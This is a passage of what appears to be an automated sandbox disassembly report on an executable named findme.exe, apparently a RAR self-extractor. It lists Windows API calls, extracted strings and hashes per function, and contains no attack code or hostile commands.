                    • _free.LIBCMT ref: 004EC33B
                    • _free.LIBCMT ref: 004EC358
                    • _free.LIBCMT ref: 004EC370
                    Strings
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: PO
                    • API String ID: 161543041-153574497
                    APIs
                    • GetWindow.USER32(?,00000005), ref: 004DCD51
                    • GetClassNameW.USER32(00000000,?,00000800), ref: 004DCD7D
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004DCD99
                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004DCDB0
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004DCDC4
                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004DCDED
                    • DeleteObject.GDI32(00000000), ref: 004DCDF4
                    • GetWindow.USER32(00000000,00000002), ref: 004DCDFD
                    Strings
                    Similarity
                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                    • String ID: STATIC
                    • API String ID: 3820355801-1882779555
                    APIs
                    • _free.LIBCMT ref: 004E8EC5
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004E8ED1
                    • _free.LIBCMT ref: 004E8EDC
                    • _free.LIBCMT ref: 004E8EE7
                    • _free.LIBCMT ref: 004E8EF2
                    • _free.LIBCMT ref: 004E8EFD
                    • _free.LIBCMT ref: 004E8F08
                    • _free.LIBCMT ref: 004E8F13
                    • _free.LIBCMT ref: 004E8F1E
                    • _free.LIBCMT ref: 004E8F2C
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    Strings
                    Similarity
                    • API ID:
                    • String ID: ;%u$x%u$xc%u
                    • API String ID: 0-2277559157
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DAD20
                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 004DAD47
                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004DAD60
                    • SetWindowTextW.USER32(?,?), ref: 004DAD71
                    • GetDlgItem.USER32(?,00000065), ref: 004DAD7A
                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004DAD8E
                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004DADA4
                    Strings
                    Similarity
                    • API ID: MessageSend$Item$TextWindow$Dialog
                    • String ID: LICENSEDLG
                    • API String ID: 3214253823-2177901306
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C9448
                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004C946B
                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004C948A
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    • _swprintf.LIBCMT ref: 004C9526
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • MoveFileW.KERNEL32(?,?), ref: 004C9595
                    • MoveFileW.KERNEL32(?,?), ref: 004C95D5
                    Strings
                    Similarity
                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                    • String ID: rtmp%d
                    • API String ID: 2111052971-3303766350
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004D8F38
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004D8F59
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 004D8F80
                    Strings
                    Similarity
                    • API ID: Global$AllocByteCharCreateMultiStreamWide
                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                    • API String ID: 4094277203-4209811716
                    APIs
                    • GetLastError.KERNEL32(?,00500EE8,004E3E14,00500EE8,?,?,004E3713,00000050,?,00500EE8,00000200), ref: 004E8FA9
                    • _free.LIBCMT ref: 004E8FDC
                    • _free.LIBCMT ref: 004E9004
                    • SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E9011
                    • SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E901D
                    • _abort.LIBCMT ref: 004E9023
                    Strings
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID: XO
                    • API String ID: 3160817290-962008992
                    APIs
                    • __aulldiv.LIBCMT ref: 004D0A9D
                      • Part of subcall function 004CACF5: GetVersionExW.KERNEL32(?), ref: 004CAD1A
                    • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004D0AC0
                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004D0AD2
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004D0AE3
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0AF3
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0B03
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004D0B3D
                    • __aullrem.LIBCMT ref: 004D0BCB
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                    • String ID:
                    • API String ID: 1247370737-0
                    APIs
                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,004EF5A2,?,00000000,?,00000000,00000000), ref: 004EEE6F
                    • __fassign.LIBCMT ref: 004EEEEA
                    • __fassign.LIBCMT ref: 004EEF05
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 004EEF2B
                    • WriteFile.KERNEL32(?,?,00000000,004EF5A2,00000000,?,?,?,?,?,?,?,?,?,004EF5A2,?), ref: 004EEF4A
                    • WriteFile.KERNEL32(?,?,00000001,004EF5A2,00000000,?,?,?,?,?,?,?,?,?,004EF5A2,?), ref: 004EEF83
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    APIs
                    • GetTempPathW.KERNEL32(00000800,?), ref: 004DC54A
                    • _swprintf.LIBCMT ref: 004DC57E
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • SetDlgItemTextW.USER32(?,00000066,0050946A), ref: 004DC59E
                    • _wcschr.LIBVCRUNTIME ref: 004DC5D1
                    • EndDialog.USER32(?,00000001), ref: 004DC6B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                    • String ID: %s%s%u
                    • API String ID: 2892007947-1360425832
                    APIs
                    • ShowWindow.USER32(?,00000000), ref: 004D964E
                    • GetWindowRect.USER32(?,00000000), ref: 004D9693
                    • ShowWindow.USER32(?,00000005,00000000), ref: 004D972A
                    • SetWindowTextW.USER32(?,00000000), ref: 004D9732
                    • ShowWindow.USER32(00000000,00000005), ref: 004D9748
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: Window$Show$RectText
                    • String ID: RarHtmlClassName
                    • API String ID: 3937224194-1658105358
                    APIs
                      • Part of subcall function 004EBF79: _free.LIBCMT ref: 004EBFA2
                    • _free.LIBCMT ref: 004EC003
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004EC00E
                    • _free.LIBCMT ref: 004EC019
                    • _free.LIBCMT ref: 004EC06D
                    • _free.LIBCMT ref: 004EC078
                    • _free.LIBCMT ref: 004EC083
                    • _free.LIBCMT ref: 004EC08E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    APIs
                    • GetLastError.KERNEL32(?,?,004E20C1,004DFB12), ref: 004E20D8
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E20E6
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E20FF
                    • SetLastError.KERNEL32(00000000,?,004E20C1,004DFB12), ref: 004E2151
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    APIs
                    • GetLastError.KERNEL32(?,00500EE8,00000200,004E895F,004E58FE,?,?,?,?,004CD25E,?,02C03C18,00000063,00000004,004CCFE0,?), ref: 004E902E
                    • _free.LIBCMT ref: 004E9063
                    • _free.LIBCMT ref: 004E908A
                    • SetLastError.KERNEL32(00000000,004F3958,00000050,00500EE8), ref: 004E9097
                    • SetLastError.KERNEL32(00000000,004F3958,00000050,00500EE8), ref: 004E90A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID: XO
                    • API String ID: 3170660625-962008992
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                    • API String ID: 0-1718035505
                    APIs
                    • _free.LIBCMT ref: 004E807E
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004E8090
                    • _free.LIBCMT ref: 004E80A3
                    • _free.LIBCMT ref: 004E80B4
                    • _free.LIBCMT ref: 004E80C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID: O
                    • API String ID: 776569668-4042636462
                    APIs
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0D0D
                      • Part of subcall function 004CACF5: GetVersionExW.KERNEL32(?), ref: 004CAD1A
                    • LocalFileTimeToFileTime.KERNEL32(?,004D0CB8), ref: 004D0D31
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004D0D47
                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004D0D56
                    • SystemTimeToFileTime.KERNEL32(?,004D0CB8), ref: 004D0D64
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0D72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion
                    • String ID:
                    • API String ID: 2092733347-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    APIs
                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004DD2F2
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DD30C
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DD31D
                    • TranslateMessage.USER32(?), ref: 004DD327
                    • DispatchMessageW.USER32(?), ref: 004DD331
                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004DD33C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                    • String ID:
                    • API String ID: 2148572870-0
                    APIs
                    • _wcschr.LIBVCRUNTIME ref: 004DC435
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: CompareString_wcschr
                    • String ID: <$HIDE$MAX$MIN
                    • API String ID: 2548945186-3358265660
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DA9DE
                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 004DA9F6
                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 004DAA24
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: GETPASSWORD1$xjQ
                    • API String ID: 445417207-1163178184
                    APIs
                    • LoadBitmapW.USER32(00000065), ref: 004DADFD
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004DAE22
                    • DeleteObject.GDI32(00000000), ref: 004DAE54
                    • DeleteObject.GDI32(00000000), ref: 004DAE77
                      • Part of subcall function 004D9E1C: FindResourceW.KERNEL32(004DAE4D,PNG,?,?,?,004DAE4D,00000066), ref: 004D9E2E
                      • Part of subcall function 004D9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,004DAE4D,00000066), ref: 004D9E46
                      • Part of subcall function 004D9E1C: LoadResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E59
                      • Part of subcall function 004D9E1C: LockResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E64
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                    • String ID: ]
                    • API String ID: 142272564-3352871620
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DCCDB
                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004DCCF1
                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 004DCD05
                    • SetDlgItemTextW.USER32(?,00000068), ref: 004DCD14
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: RENAMEDLG
                    • API String ID: 445417207-3299779563
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004E251A
                      • Part of subcall function 004E2B52: ___AdjustPointer.LIBCMT ref: 004E2B9C
                    • _UnwindNestedFrames.LIBCMT ref: 004E2531
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004E2543
                    • CallCatchBlock.LIBVCRUNTIME ref: 004E2567
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID: /)N
                    • API String ID: 2633735394-426912691
                    • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                    • Instruction ID: cfdfbbbc005b6c4c47ae94e859329a45aa5a8a3cd3e45f1fb7c264864b9a8821
                    • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                    • Instruction Fuzzy Hash: C1016D32000149BBCF125F56CE01EDA3BBAFF58715F05401AFD1861120C379E861DBA9
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004E7573,00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002), ref: 004E75E2
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004E75F5
                    • FreeLibrary.KERNEL32(00000000,?,?,?,004E7573,00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002), ref: 004E7618
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 2a8a42217b600f6f821ed40a0ff43a12f23d60e75efcbf2e825cf1478727b589
                    • Instruction ID: c507f19b83a9da8cf6dc336f9f92e2692ef9f4ce94676cb80bb73090a9b43115
                    • Opcode Fuzzy Hash: 2a8a42217b600f6f821ed40a0ff43a12f23d60e75efcbf2e825cf1478727b589
                    • Instruction Fuzzy Hash: 27F0A43060450CBBDB119F65DC09BAEBFB8EF04727F1000AAF805A6250DF348A50CA58
                    APIs
                      • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                      • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004CEB92
                    • GetProcAddress.KERNEL32(005081C0,CryptUnprotectMemory), ref: 004CEBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                    • API String ID: 2141747552-1753850145
                    • Opcode ID: 9e5475aa8feac306673c1baf3381c8c3b11a4dfafe43a0e1347b721e543ee738
                    • Instruction ID: a953c6ee0edc09c1e34a8921527abb8f307af8fbaa6201ec1373a02291a092e1
                    • Opcode Fuzzy Hash: 9e5475aa8feac306673c1baf3381c8c3b11a4dfafe43a0e1347b721e543ee738
                    • Instruction Fuzzy Hash: 43E04FB4400741AECB319F359809F62BAE45B14706F10886FE5D6D3240EAF8D5408B68
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 81ea926bffb5ef3d0193cffbb3ab23ab410796c4eef8424d69cb41f627ee1391
                    • Instruction ID: 8ae72193aa2350ddb138cf1e0453bf5ca461ae1e8f723793665cc99d4decf7de
                    • Opcode Fuzzy Hash: 81ea926bffb5ef3d0193cffbb3ab23ab410796c4eef8424d69cb41f627ee1391
                    • Instruction Fuzzy Hash: 5C410432A00304AFDB24DF7AC880A6EB7A5EF85325F5545AEE515EB391DB34AD01CB84
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 004EB619
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004EB63C
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004EB662
                    • _free.LIBCMT ref: 004EB675
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EB684
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 88c8f0747863968dc60ff32d9e66c79c9b88a9addacf4fc054da0f9d7f5cc667
                    • Instruction ID: 02061007f8d0c5c4c0beed7e1b8e91ca6f470ff8d70b3a64f60b1960a58f6a43
                    • Opcode Fuzzy Hash: 88c8f0747863968dc60ff32d9e66c79c9b88a9addacf4fc054da0f9d7f5cc667
                    • Instruction Fuzzy Hash: 3D01B1726016A1BB27215A7B6C88D7B6A6DDFC6BA6315022EBC04D2210DF68CD01C1FA
                    APIs
                      • Part of subcall function 004D0A41: ResetEvent.KERNEL32(?), ref: 004D0A53
                      • Part of subcall function 004D0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004D0A67
                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 004D078F
                    • CloseHandle.KERNEL32(?,?), ref: 004D07A9
                    • DeleteCriticalSection.KERNEL32(?), ref: 004D07C2
                    • CloseHandle.KERNEL32(?), ref: 004D07CE
                    • CloseHandle.KERNEL32(?), ref: 004D07DA
                      • Part of subcall function 004D084E: WaitForSingleObject.KERNEL32(?,000000FF,004D0A78,?), ref: 004D0854
                      • Part of subcall function 004D084E: GetLastError.KERNEL32(?), ref: 004D0860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                    • String ID:
                    • API String ID: 1868215902-0
                    • Opcode ID: f1ef9756baa8010c1914e7c655af860d5bb723cec9d5de45dbd77b25869185da
                    • Instruction ID: e3650184421bec5430abcc64e5f87de3b0301351286d3f47687a632d3c9edc9e
                    • Opcode Fuzzy Hash: f1ef9756baa8010c1914e7c655af860d5bb723cec9d5de45dbd77b25869185da
                    • Instruction Fuzzy Hash: D4019E72440704EFC722AF69DD84F96BBE9FB49711F00052BF15E83264CB796A54CBA8
                    APIs
                    • _free.LIBCMT ref: 004EBF28
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004EBF3A
                    • _free.LIBCMT ref: 004EBF4C
                    • _free.LIBCMT ref: 004EBF5E
                    • _free.LIBCMT ref: 004EBF70
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f68f1f819450e7c50d450a1ea019d63245e991b5b3fbe5fe7071e400c428768e
                    • Instruction ID: fadd73986260763ff77a32376a1a337102c7b8ff83f3228506c5657c8a878131
                    • Opcode Fuzzy Hash: f68f1f819450e7c50d450a1ea019d63245e991b5b3fbe5fe7071e400c428768e
                    • Instruction Fuzzy Hash: F4F0F432504691B78A20DB57ED85C1773D9FB04716754481EF408D7EA0DB28FC418A9C
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\findme.exe,00000104), ref: 004E76FD
